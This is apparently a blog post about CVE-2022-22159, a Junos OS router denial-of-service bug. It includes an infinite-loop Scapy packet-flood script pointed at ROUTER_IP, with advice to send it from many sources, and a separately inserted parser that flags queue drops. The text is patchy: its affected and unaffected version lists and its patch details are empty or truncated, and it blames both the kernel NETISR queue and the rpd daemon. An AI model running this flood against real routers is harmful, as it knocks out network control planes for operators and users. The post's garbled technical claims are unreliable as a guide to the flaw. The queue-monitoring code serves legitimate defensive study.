In early 2022, researchers uncovered CVE-2022-22159, a Denial of Service (DoS) vulnerability affecting the Juniper Networks Junos OS kernel. The flaw lies in how the NETISR network queue operates, and an attacker can trigger it simply by sending crafted, but otherwise valid, IPv4 unicast packets to a vulnerable router. If you run any of the affected Junos versions, the rpd process may spike to 100% CPU, potentially cutting off your control plane while traffic forwarding on the distributed FPC CPUs continues unaffected.

This post covers what CVE-2022-22159 is, how it’s abused, which versions are at risk, indicators of compromise, how to observe NETISR drops, and includes a step-by-step attack simulation for security researchers.

What is NETISR and Why is It Important?

NETISR (Network Interrupt Service Routine) is a network software queue used by Junos OS and FreeBSD to handle various types of network traffic asynchronously. If, for some reason, this queue starts to grow uncontrollably, kernel threads and system daemons start consuming excessive CPU — leading to a partial or complete denial of service.

Product: Juniper Networks Junos OS

- Danger: Remote Denial of Service (DoS) by an authenticated or unprivileged user, or by any attacker who can send traffic to a router interface
- CVSS Score: see the Juniper advisory (JSA11287) for scoring

Juniper's Advisory:  
The vulnerability is caused when specifically-crafted IPv4 unicast packets traverse a router that is using equal-cost multi-path (ECMP) unilist selection. When these packets are processed, the routing protocol daemon (rpd) CPU can reach close to 100%. Forwarding engines continue, but management (routing updates, new sessions, adjustments) stalls — sustaining a DoS situation.

Affected versions:

19.1R3-S3 and later before 19.1R3-S7

NOT impacted:

Exploit: How Does the Attack Work?

The attacker does not need any special access and does not exploit an authentication flaw: anyone who can send IPv4 packets to a router interface that participates in ECMP unicast routing can trigger this bug.

The attack involves repetitively sending regular packets that force the router’s NETISR queue to fill, causing the routing protocol daemon (rpd) to peg the control plane CPU.

- Destination: a route in your ECMP (unicast) pool
- Packet can be TCP/UDP/ICMP, etc.

Example Packet with Scapy

Here is Python code using Scapy that can be run from a remote Linux host (replace ROUTER_IP and ROUTABLE_IP accordingly):

from scapy.all import IP, ICMP, send

dst_ip = 'ROUTER_IP'      # Target router interface IP (in ECMP)
src_ip = 'ROUTABLE_IP'    # Any routable source IP

# Plain ICMP echo; the payload type is not what matters, the ECMP path is
pkt = IP(src=src_ip, dst=dst_ip) / ICMP()
while True:
    send(pkt, verbose=0)  # verbose=0 suppresses Scapy's per-packet output

Send this script from enough sources or with enough bandwidth, and you will gradually peg the rpd CPU. The trick is to hit the ECMP unicast path; packet content (e.g., ICMP, TCP SYN, etc.) may not matter as long as it matches a route that triggers ECMP forwarding.

Symptoms and indicators:

- Routing updates and configuration changes stall or fail
- FPC (forwarding) CPUs keep passing traffic, but new session setups and BGP/OSPF changes do not process
- Many NETISR drops visible in the system; run:

  show system queues

  and look for netisr or kernel queue drops above normal.
- General unresponsiveness to management actions
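To turn the "drops above normal" check into something repeatable, here is an added example (not from the original post or from Juniper) that parses two snapshots of `show system queues` output and flags queues whose drop counter jumped or that are nearly full. The sample output and its column layout are constructed assumptions; adjust the regex to the exact columns your Junos release prints.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample snapshots of `show system queues` (layout is an assumption).
SAMPLE_BASELINE = """\
output interface            bytes          max  packets      max    drops
ge-0/0/0                        0      1000000        0     1000        0
ge-0/0/1                     1200      1000000        4     1000        0
input protocol              bytes          max  packets      max    drops
splfwdq                         0      1000000        0     1000        0
"""

SAMPLE_NOW = """\
output interface            bytes          max  packets      max    drops
ge-0/0/0                        0      1000000        0     1000        0
ge-0/0/1                   998000      1000000      998     1000    48211
input protocol              bytes          max  packets      max    drops
splfwdq                    999900      1000000      999     1000   150334
"""

# One data row: name, bytes, bytes-max, packets, packets-max, drops.
ROW = re.compile(r"^(\S+)\s+(\d+)\s+(\d+)\s+(\d+)\s+(\d+)\s+(\d+)\s*$")


def parse_queues(text: str) -> Dict[str, Tuple[int, int, int]]:
    """Map queue name -> (packets, packets_max, drops); header lines are skipped."""
    queues = {}
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            name, _b, _bmax, pkts, pmax, drops = m.groups()
            queues[name] = (int(pkts), int(pmax), int(drops))
    return queues


def queue_alerts(before: str, after: str, drop_delta: int = 1000,
                 fill_pct: int = 90) -> List[Tuple[str, int, int]]:
    """Return (name, new_drops, percent_full) for queues whose drop counter grew
    by more than drop_delta between snapshots, or that are >= fill_pct full."""
    base, now = parse_queues(before), parse_queues(after)
    alerts = []
    for name, (pkts, pmax, drops) in now.items():
        new_drops = drops - base.get(name, (0, 0, 0))[2]
        pct = pkts * 100 // pmax if pmax else 0
        if new_drops > drop_delta or pct >= fill_pct:
            alerts.append((name, new_drops, pct))
    return alerts


if __name__ == "__main__":
    for name, new_drops, pct in queue_alerts(SAMPLE_BASELINE, SAMPLE_NOW):
        print(f"ALERT {name}: +{new_drops} drops, queue {pct}% full")
```

Take the baseline snapshot during normal operation so that a steady, expected drop rate is not mistaken for an attack.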

If you see these signs, call Juniper JTAC: they can provide advanced diagnostics and suggestions.

Fixes, Patches, and Mitigation

Patches:  
Junos OS SIRT notification JSA11287 - CVE-2022-22159

References

1. Juniper Security Advisory JSA11287
2. NIST NVD Report for CVE-2022-22159
3. Juniper JTAC Support
4. Scapy project

Conclusion

CVE-2022-22159 is an excellent example of how a software queue implementation flaw can cripple a router’s brain — the control plane — without even touching the data plane. Anyone running affected Junos OS versions must upgrade or apply controls immediately. While the forwarding CPU and ongoing sessions are not interrupted at first, a stuck control plane is a ticking time bomb for enterprise operations.

*If you suspect you are being targeted, act fast: check system queues, block offending flows, and engage JTAC for diagnostics. Keep your systems patched to prevent easy DoS wins for attackers.*


Timeline

Published on: 01/19/2022 01:15:00 UTC
Last modified on: 01/31/2022 18:17:00 UTC